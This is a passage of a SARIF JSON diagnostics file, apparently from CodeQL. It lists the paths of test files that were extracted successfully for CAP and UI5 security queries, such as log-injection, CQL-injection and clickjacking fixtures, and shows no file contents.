},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/model.cds.json","uriBaseId":"%SRCROOT%","index":188}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":189}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json","uriBaseId":"%SRCROOT%","index":190}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":195}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":196}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/package.json","uriBaseId":"%SRCROOT%","index":197}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":198}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":200}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":201}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/model.cds.json","uriBaseId":"%SRCROOT%","index":202}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":203}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":205}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":206}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":207}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":208}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":209}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":211}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":212}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":215}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":216}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":218}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":219}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":220}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":221}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":222}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":224}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json","uriBaseId":"%SRCROOT%","index":227}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":228}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":229}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/model.cds.json","uriBaseId":"%SRCROOT%","index":230}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":232}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/model.cds.json","uriBaseId":"%SRCROOT%","index":235}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":239}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":240}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":241}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":242}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":243}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":245}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.html","uriBaseId":"%SRCROOT%","index":246}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.json","uriBaseId":"%SRCROOT%","index":247}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.view.xml","uriBaseId":"%SRCROOT%","index":248}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":250}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/binding_path/binding1.xml","uriBaseId":"%SRCROOT%","index":251}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml","uriBaseId":"%SRCROOT%","index":252}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/dynamic_write_to_html_content/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":253}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":254}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":255}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/sink/sink1.xml","uriBaseId":"%SRCROOT%","index":256}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/models/source/source1.xml","uriBaseId":"%SRCROOT%","index":257}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":258}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":259}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":260}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":261}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":262}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html","uriBaseId":"%SRCROOT%","index":263}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml","uriBaseId":"%SRCROOT%","index":264}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":265}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":266}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":267}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":268}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":